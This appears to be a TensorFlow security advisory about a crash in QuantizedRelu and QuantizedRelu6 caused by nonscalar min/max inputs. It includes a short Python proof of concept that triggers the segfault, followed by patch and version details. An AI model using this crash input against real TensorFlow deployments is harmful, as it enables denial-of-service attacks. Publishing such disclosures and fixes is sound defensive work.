If QuantizedRelu
or QuantizedRelu6
are given nonscalar inputs for min_features
or max_features
, it results in a segfault that can be used to trigger a denial of service attack.
import tensorflow as tf
out_type = tf.quint8
features = tf.constant(28, shape=[4,2], dtype=tf.quint8)
min_features = tf.constant([], shape=[0], dtype=tf.float32)
max_features = tf.constant(-128, shape=[1], dtype=tf.float32)
tf.raw_ops.QuantizedRelu(features=features, min_features=min_features, max_features=max_features, out_type=out_type)
tf.raw_ops.QuantizedRelu6(features=features, min_features=min_features, max_features=max_features, out_type=out_type)
We have patched the issue in GitHub commit 49b3824d83af706df0ad07e4e677d88659756d89.
The fix will be included in TensorFlow 2.10.0. We will also cherrypick this commit on TensorFlow 2.9.1, TensorFlow 2.8.1, and TensorFlow 2.7.2, as these are also affected and still in supported range.
Please consult our security guide for more information regarding the security model and how to contact us with issues and questions.
This vulnerability has been reported by Neophytos Christou, Secure Systems Labs, Brown University.